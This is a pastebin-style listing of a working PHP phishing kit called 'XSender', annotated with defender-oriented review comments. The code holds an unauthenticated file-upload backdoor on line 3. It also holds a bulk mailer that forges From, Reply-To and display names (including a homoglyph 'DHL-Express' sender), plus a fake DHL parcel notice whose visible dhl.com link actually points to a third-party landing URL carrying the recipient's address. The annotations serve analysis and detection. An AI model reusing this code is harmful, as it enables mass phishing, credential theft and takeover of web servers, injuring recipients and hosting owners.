PalmaSolutions

123we.php

Jun 29th, 2018
  1. <?php
  2.  
  // NOTE(review): unauthenticated upload backdoor, independent of the mailer below.
  // When the request carries an `x` query parameter it prints php_uname() and getcwd()
  // wrapped in [uname]/[dir] markers, renders an upload form, and copy()s the uploaded
  // temp file to the client-supplied file name, relative to the working directory.
  // No authentication, extension or path check is visible on this line.
  // Defender view: a host serving this file should be treated as compromised; review
  // web-server logs for requests to this path with `x` in the query string and look for
  // files created alongside the script after its first appearance.
  3. if(isset($_GET["x"])){echo"<font color=#000000>[uname]".php_uname()."[/uname]";echo"<br><font color=#000000>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}
  4.  
  // Hard-coded landing URL; email_format() reads it through `global $website` and appends
  // "/?email=<recipient>" to build the link placed in the message body.
  // NOTE(review): the commented-out URL on the next line is presumably an earlier landing
  // location. Both hosts are indicators exactly as published in this paste; whether they
  // were attacker-owned or compromised third-party sites cannot be told from here.
  5. $website="http://klsons.com/"; //Make this full url including folders of where login files resides
  6. // http://b-olam.kz/images/iv/
  7.  
  8. //sanitize data where any character is allowed
  // Normalises one submitted field so it can be echoed into the panel's HTML:
  // un-escapes \' and \", parks every remaining backslash behind a placeholder token,
  // trims, replaces < and > with entities, turns every newline form into the literal
  // "<br/>", encodes ' and ", and finally emits the parked backslashes as &#92;.
  // Because newlines become "<br/>", the request handler falls back to '<br/>' as the
  // address separator when none is supplied.
  // NOTE(review): `&` is not encoded, so this is not a complete HTML escape.
  9. function sanitizer($check){
  10. $check=str_replace("\'","'",$check);
  11. $check=str_replace('\"','"',$check);
  12. $check=str_replace("\\","TN9OO***:::::t&*HHHHOOOoooo0000N",$check); //just to keep track of what I will change later
  13. $check=trim($check);
  14. $check=str_replace("<","&lt;",$check);
  15. $check=str_replace('>','&gt;',$check);
  16. $check=str_replace("\r\n","<br/>",$check);
  17. $check=str_replace("\n","<br/>",$check);
  18. $check=str_replace("\r","<br/>",$check);
  19. $check=str_replace("'","&#39;",$check);
  20. $check=str_replace('"','&quot;',$check);
  21. $check=str_replace("TN9OO***:::::t&*HHHHOOOoooo0000N","&#92;",$check); //returning backslash in html entity
  22. return $check;}
  23.  
  24. //makes data ok on edit textarea
  // Partial inverse of sanitizer(), used when a posted value is printed back into a
  // <textarea>: "<br/>" becomes "\r\n" and the &gt; &lt; &#39; &quot; entities are decoded.
  // The first replacement consumes every "<br/>", so the two that follow it have nothing
  // left to match. The &#92; entity produced by sanitizer() is not reversed here.
  // NOTE(review): in this listing the function is applied to raw $_POST values, i.e. it
  // decodes entities in text that was never encoded by sanitizer().
  25. function resanitize($check){
  26. $check=str_replace("<br/>","\r\n",$check);
  27. $check=str_replace("<br/>","\n",$check);
  28. $check=str_replace("<br/>","\r",$check);
  29. $check=str_replace("&gt;",">",$check);
  30. $check=str_replace("&lt;","<",$check);
  31. $check=str_replace("&#39;","'",$check);
  32. $check=str_replace('&quot;','"',$check);
  33. return $check;}
  34.  
  35. //validate email address
  // Format check only: returns true when $email matches the pattern below, false otherwise.
  // The pattern has no case-insensitive flag, so it accepts lower-case letters, digits,
  // `_`, `-` and `.` in the local part and requires a final label of two or three letters.
  // No DNS or deliverability check is made. The request handler uses the result to decide
  // which pasted addresses are passed to sending_email().
  36. function validate_email($email){
  37. $status=false;
  38. $regex='/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*(\.[a-z]{2,3})$/';
  39. if(preg_match($regex, $email)){$status=true;}
  40. return $status; }
  41.  
  42.  
  43.  
  // Derives per-recipient values from a "address[ extra]" string: the first
  // space-separated token is taken as the address, then its first two characters and
  // its domain part are extracted. Returns [sender name, sender email, address,
  // two-character prefix, domain].
  // $sender_email is never assigned inside the function, so that slot is always null;
  // $param is computed and not used. No call to subjsender() appears in this listing.
  // NOTE(review): the hard-coded sender name is a MIME encoded-word (UTF-8, base64). It
  // appears to decode to a look-alike spelling of "DHL-Express" in which several letters
  // are Greek/Cyrillic homoglyphs. Mixed-script display names of this kind are a useful
  // signal for mail filtering. Confirm the decode before relying on it.
  44. function subjsender($user_data){
  45. $user = explode(' ', $user_data);
  46. $to = is_array($user) ? $user[0] : $user_data;
  47. $tw = substr($to, 0, 2);
  48. $prem = explode('@',$to);
  49. $prams = explode('.',$prem[1]);
  50. $param = strtoupper($prams[0]);
  51. $sender_name = '=?UTF-8?B?RM6XTC3OldGFz4HQs8m1c3M=?=';
  52. return array($sender_name,$sender_email,$to,$tw,$prem[1]);
  53. }
  // Returns a string of $length characters (default 3) drawn with rand() from the
  // 62-character alphabet 0-9, a-z, A-Z.
  // In this file the result only feeds the [-randomstring-] and [-randomletters-]
  // placeholders that sending_email() substitutes into each message body, so every
  // message carries different filler text.
  54. function generateRandomString($length = 3) {
  55. $characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
  56. $charactersLength = strlen($characters);
  57. $randomString = '';
  58. for ($i = 0; $i < $length; $i++) {
  59. $randomString .= $characters[rand(0, $charactersLength - 1)];
  60. }
  61. return $randomString;
  62. }
  63.  
  64.  
  65. //Email sending
  // Builds one multipart/mixed message for $email and hands it to mail().
  // Every sender-facing value (From address, display name, subject, Reply-To, HTML body)
  // is read directly from $_POST, split into alternatives, and one alternative is picked
  // at random per message. Nothing ties the From address to the sending host.
  // The $id and $attach parameters are not used; the attachment is read from
  // $_FILES['attach'] instead. $randstr, $rand and $site_name are assigned and not used
  // by any active line.
  // Defender view, all visible below: the Content-Type header is written with
  // "boundary = " (spaces around "=") and is terminated by "\r\r\n\n"; each body part
  // repeats "MIME-Version: 1.0"; the HTML part is base64 with charset iso-8859-1; the
  // attachment part carries a numeric "X-Attachment-Id". These are artifacts of this
  // builder and can support header-based detection of mail it produced.
  66. function sending_email($email,$id='1',$attach=NULL)
  67. {
  68. $randstr = generateRandomString();
  69. $rand=rand(999,99999);
  // Each posted field is treated as a list of alternatives, one per line.
  70. $semails = explode("\n",$_POST['semail']);
  71. $subjects = explode("\n",$_POST['subj']);
  72. $semailnames = explode("\n",$_POST['semailname']);
  // The body is split on "\r\n", so each line of the pasted message is a separate alternative.
  73. $html_messs = explode("\r\n", $_POST['html_mess']);
  74. $reply_tos = explode("\n", $_POST['reply_to']);
  75.  
  76. $semail = $semails[rand()%count($semails)];
  77. $subject = $subjects[rand()%count($subjects)];
  78. $semailname = base64_encode($semailnames[rand()%count($semailnames)]);
  79. $boundary = md5(uniqid(time()));
  80. $reply_to = $reply_tos[rand()%count($reply_tos)];
  81.  
  82. //echo $semail . '<br/>' . $subject . '<br/>' . $semailname . '<br/>';
  83.  
  // Per-message random values and timestamps for the body placeholders below.
  84. $randval=rand(7,20);
  85. $randommix=generateRandomString($randval);
  86. $randomstring=generateRandomString($randval);
  87. $randomnumber=rand(9999,99999);
  88. $randommd5=md5($randomnumber);
  89. $totime = date("g:ia");
  90. $today = date("F j, Y");
  91. $em=explode('@',$email);
  92.  
  // NOTE(review): the commented-out lines keep an earlier hard-coded sender domain and
  // subject; the domain is an indicator as published in this paste.
  93. //$semail = "no-reply-shipment".$rand."@dhlshipmentlatami-asahiclean.com";
  94. //$semail =str_replace("@","".generateRandomString()."@".generateRandomString().".", $semail);
  95. //$subject='Tracking update: Status of your parcel changed';
  96. $site_name='Account Security';
  97. // To send HTML mail, the Content-type header must be set
  // The display name is sent as a base64 encoded-word; the address and Reply-To are
  // interpolated exactly as posted.
  98. $header = "From: =?UTF-8?B?{$semailname}?= <{$semail}>\r\n";
  99. $header.= "MIME-Version: 1.0\r\n";
  100. $header.= "Reply-To: {$reply_to}\r\n";
  101. $header.= "Content-Type: multipart/mixed; boundary = " . $boundary . "\r\r\n\n";
  102.  
  103. $message = "--" . $boundary . "\r\n";
  104. $message .= "Content-Type: text/html; charset=iso-8859-1\r\n";
  105. $message .= "MIME-Version: 1.0\r\n";
  106. $message .= "Content-Transfer-Encoding: base64\r\n\r\n";
  107.  
  108. $html_mess = $html_messs[rand()%count($html_messs)];
  109.  
  // Template placeholders: recipient address and its two halves, the sending host and
  // script path, the random tokens, and the current time/date. The [-host-]/[-self-]
  // pair lets a template reference the URL of the host this script is served from.
  110. $html_mess = str_replace('[-email-]', $email, $html_mess);
  111. $html_mess = str_replace('[-start-]', $em[0], $html_mess);
  112. $html_mess = str_replace('[-end-]', $em[1], $html_mess);
  113. $html_mess = str_replace('[-host-]', $_SERVER['HTTP_HOST'], $html_mess);
  114. $html_mess = str_replace('[-self-]', $_SERVER['PHP_SELF'], $html_mess);
  115. $html_mess = str_replace('[-randomstring-]', $randommix, $html_mess);
  116. $html_mess = str_replace('[-randommd5-]', $randommd5, $html_mess);
  117. $html_mess = str_replace('[-randomletters-]', $randomstring, $html_mess);
  118. $html_mess = str_replace('[-randomnumber-]', $randomnumber, $html_mess);
  119. $html_mess = str_replace('[-time-]', $totime, $html_mess);
  120. $html_mess = str_replace('[-date-]', $today, $html_mess);
  121.  
  122. $message .= base64_encode($html_mess) . "\r\n";
  123.  
  // Optional attachment: type and file name are taken as supplied by the uploading client.
  124. if ($_FILES['attach']['size'] > 0)
  125. {
  126. $message .= "--" . $boundary . "\r\n"
  127. . "Content-Type:" . $_FILES['attach']['type'] . "; name=\"" . $_FILES['attach']['name'] . "\"\r\n"
  128. . "MIME-Version: 1.0\r\n"
  129. . "Content-Disposition: attachment; filename=\"" . $_FILES['attach']['name'] . "\"\r\n"
  130. . "Content-Transfer-Encoding: base64\r\n"
  131. . "X-Attachment-Id: " . rand(1000,99999) . "\r\n\r\n"
  132. . base64_encode(chunk_split(fread(fopen($_FILES['attach']['tmp_name'], "r"),$_FILES['attach']['size']))) . "\r\n"
  133. . "--" . $boundary . "--\r\n";
  134. }
  135. else
  136. {
  137. $message .= "--" . $boundary . "--\r\n";
  138. }
  139.  
  // Errors are suppressed with @ and the return value is discarded, so the panel's
  // "Sent" figure is not evidence of delivery when reconstructing an incident.
  140. @mail($email,$subject, $message, $header);
  141. }
  142.  
  143.  
  144.  
  // Returns a fixed HTML message body for $email: a style block followed by a short
  // parcel-status notice signed as a courier company.
  // The link target is $website . "/?email=" . $email (the recipient address is passed
  // to the landing page), while the visible link text is a different, hard-coded
  // https://dhl.com/... URL. That mismatch between displayed URL and href is the
  // recipient-facing indicator to look for in samples.
  // $id, $em, $tw and $prem are not used in the returned string. No call to
  // email_format() appears in this listing; sending_email() takes its body from
  // $_POST['html_mess'] instead.
  145. function email_format($email,$id='1'){
  146. global $website;
  147. $url=$website."/?email=".$email;
  148. $em=explode('@',$email);
  149. $tw = substr($email, 0, 2);
  150. $prem = explode('@',$email);
  151.  
  152. $message="
  153. <!doctype html>
  154. <html>
  155. <head>
  156. <style>
  157. body {
  158. background-color:#FFFFFF;
  159. font-size:16px;
  160. font-family:monospace;
  161. margin:0;
  162. padding:0;
  163. -ms-text-size-adjust: 100%;
  164. -webkit-text-size-adjust: 100%;
  165. }
  166.  
  167. ul.a {
  168. list-style-type: circle;
  169. }
  170.  
  171. ul.b {
  172. list-style-type: square;
  173. }
  174.  
  175.  
  176.  
  177. table {
  178. border: none;
  179. border-collapse: separate;
  180. width: 100%; }
  181. table td {
  182. font-family: monospace;
  183. font-size: 14px;
  184. vertical-align: top; }
  185.  
  186. /* -------------------------------------
  187. RESPONSIVE AND MOBILE FRIENDLY STYLES
  188. ------------------------------------- */
  189.  
  190. @media only screen and (max-width: 620px) {
  191. table[class=body] h1 {
  192. font-size: 28px !important;
  193. margin-bottom: 10px !important; }
  194. table[class=body] p,
  195. table[class=body] ul,
  196. table[class=body] ol,
  197. table[class=body] td,
  198. table[class=body] span,
  199. table[class=body] a {
  200. font-size: 16px !important; }
  201. table[class=body] .wrapper,
  202. table[class=body] .article {
  203. padding: 10px !important; }
  204. table[class=body] .content {
  205. padding: 0 !important; }
  206. table[class=body] .container {
  207. padding: 0 !important;
  208. width: 100% !important; }
  209. table[class=body] .main {
  210. border-left-width: 0 !important;
  211. border-radius: 0 !important;
  212. border-right-width: 0 !important; }
  213. table[class=body] .btn table {
  214. width: 100% !important; }
  215. table[class=body] .btn a {
  216. width: 100% !important; }
  217. table[class=body] .img-responsive {
  218. height: auto !important;
  219. max-width: 100% !important;
  220. width: auto !important; }}
  221.  
  222. </style>Status of your parcel has changed.<br><br>Track your parcel here: <a href='".$url."'> https://dhl.com/tracking_shipment/jsu3hty3hy4gey3yerh</a></p>
  223. <p>We hope to receive your correct delivery details to enable us schedule a new delivery</p>
  224. <br><br>
  225. <p>Best Regards</p>
  226. <p>DHL International &copy;</p>
  227.  
  228.  
  229. ";
  230.  
  231. return $message; }
  232.  
  233.  
  234.  
  235.  
  236.  
  237.  
  238.  
  239. ?><html>
  240. <head>
  241. <title>Xsender</title>
  242. </head>
  243. <body style='width:100%;color:#000;background:#E0E6F8;font-family:calibri;'>
  244. <div style='width:100%;max-width:600px;margin:0px auto 0px auto;padding:10px;border:#999 1px solid;box-shadow:10px 10px #666;min-height:500px;'>
  245.  
  246. <h1 style='color:#666;text-align:center;text-shadow:#000 1px 1px;'>XSender</h1>
  247.  
  248.  
  249. <?php
  // Request handler for the panel's "Go Xsender" button (POST field `go`).
  // Nothing visible in this file checks who is making the request, so any client that
  // can reach the script can use the host to send mail; outbound mail volume from the
  // web-server account is therefore a practical detection point.
  // Flow: sanitise id/separator/mails, split the pasted list on the separator
  // (default '<br/>', which is what sanitizer() turns newlines into), validate each
  // entry with validate_email(), and call sending_email() for every entry that passes.
  // The "Sent" total counts addresses that passed validation, not confirmed deliveries.
  // NOTE(review): $_SESSION is written here but no session_start() appears in this
  // listing, so the stored id is presumably not kept between requests.
  250. if(isset($_POST['go']) ){
  251. //sanitize the data
  252. srand(time(NULL));
  253. $_SESSION['xsenderid']=sanitizer($_POST['id']);
  254. $separator=sanitizer($_POST['separator']);
  255. $mails=sanitizer($_POST['mails']);
  256. $id=$_SESSION['xsenderid'];
  257. if($separator==''){$separator='<br/>';}
  258. if($mails!=''){
  259. $mails=explode($separator,$mails);
  260. $total=count($mails);
  261. $valid=0;
  262. for($i=0;$i<$total;$i++){
  263. $email=$mails[$i];
  264. if(validate_email($email)){
  265. $valid=$valid+1;
  266. print "<div style='color:green;'>".$email." valid and queued</div>";
  267. //Send here
  268. sending_email($email,$id);
  269. //send here
  270. } else {print "<div style='color:gray;'>".$email." not valid</div>"; }
  271. }
  272. print "<h1 style='color:green;'>Bravo! ".$valid."/".$total." Sent! <a href='' style='color:green'>Continue</a></h1>";
  273.  
  274.  
  275. } else {print "<h1 style='color:red'>Mails or Details empty</h1>"; }
  276. }
  277. ?>
  278.  
  279.  
  280.  
  281.  
  282.  
  283.  
  284.  
  285.  
  286.  
  287.  
  288.  
  289.  
  290. <form method='POST' action='#' enctype="multipart/form-data">
  291. <div>
  292. <div>Select Your ID</div>
  293. <select name='id' style='width:100%;'>
  294. <?php
  // Pre-selects the id stored by the request handler, when one is set, by printing it as
  // the first <option>. The value was passed through sanitizer() when it was stored.
  295. if(isset($_SESSION['xsenderid']))
  296. {print "<option value='".$_SESSION['xsenderid']."'>".$_SESSION['xsenderid']."</option>";}
  297. ?>
  298. <option value='1'>1</option>
  299. <option value='2'>2</option>
  300. <option value='3'>3</option>
  301. <option value='4'>4</option>
  302. </select>
  303. </div>
  304. <p>&nbsp;</p>
  305.  
  306.  
  307.  
  308.  
  309.  
  310. <div>
  311. <div>Email Separator (Leave Empty if new line)</div>
  312. <textarea name='separator' style='width:100%;height:20px;'><?php if(isset($_POST['separator'])){print resanitize($_POST['separator']);} ?></textarea>
  313. </div>
  314. <p>&nbsp;</p>
  315.  
  316.  
  317.  
  318.  
  319.  
  320. <div>
  321. <div>Paste Emails separated by separator</div>
  322. <textarea name='mails' style='width:100%;height:200px;'><?php if(isset($_POST['mails'])){print resanitize($_POST['mails']);} ?></textarea>
  323. </div>
  324. <p>&nbsp;</p>
  325.  
  326. <div>
  327. <div>Email display name</div>
  328. <input type="text" name='semailname' />
  329. </div>
  330. <p>&nbsp;</p>
  331.  
  332. <div>
  333. <div>Email to send from</div>
  334. <input type="text" name='semail' />
  335. </div>
  336. <p>&nbsp;</p>
  337.  
  338. <div>
  339. <div>Reply-To email:</div>
  340. <input type="text" name='reply_to' />
  341. </div>
  342. <p>&nbsp;</p>
  343.  
  344. <div>
  345. <div>Subject</div>
  346. <input type="text" name='subj' />
  347. </div>
  348. <p>&nbsp;</p>
  349.  
  350. <div>Email Message (paste HTML code) or text</div>
  351. <textarea name='html_mess' style='width:100%;height:300px;'></textarea>
  352. <p>&nbsp;</p>
  353.  
  354. <div>
  355. <input type="file" name="attach" /> <label for="attach">Attachment</label>
  356. </div>
  357. <p>&nbsp;</p>
  358. </div>
  359.  
  360.  
  361. <div style='text-align:center;'>
  362. <input type='submit' value='Go Xsender' name='go' style='color:#FFF;background:#333;'/>
  363. </div>
  364. <p>&nbsp;</p>
  365. </form>
  366.  
  367.  
  368.  
  369. </div>
  370. </body>
  371. </html>